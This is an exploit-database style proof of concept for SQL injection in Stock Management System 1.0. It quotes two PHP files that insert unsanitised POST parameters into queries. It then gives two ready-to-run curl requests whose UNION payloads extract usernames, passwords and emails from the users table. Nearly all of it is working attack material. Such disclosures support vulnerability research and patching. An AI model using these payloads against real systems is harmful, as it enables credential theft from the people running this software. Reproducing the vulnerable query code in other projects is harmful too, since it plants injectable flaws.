# Exploit Title: Stock Management System 1.0 - SQL Injection
# Dork: N/A
# Date: 2020-10-22
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
# Version: 1.0
# Tested on: Linux
# CVE: N/A

# POC:
# 1)
#
fetchSelectedBrand.php
#
$brandId = $_POST['brandId'];
$sql = "SELECT brand_id, brand_name, brand_active, brand_status FROM brands WHERE brand_id = $brandId";
#
curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 170' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \
    --data-binary $'brandId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \
    $'http://localhost/ExploitDb/stock/php_action/fetchSelectedBrand.php'
#
# POC:
# 2)
#
fetchSelectedCategories.php
#
$categoriesId = $_POST['categoriesId'];
$sql = "SELECT categories_id, categories_name, categories_active, categories_status FROM categories WHERE categories_id = $categoriesId";
#
curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 175' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
    -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \
    --data-binary $'categoriesId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \
    $'http://localhost/ExploitDb/stock/php_action/fetchSelectedCategories.php'
#
# ++

#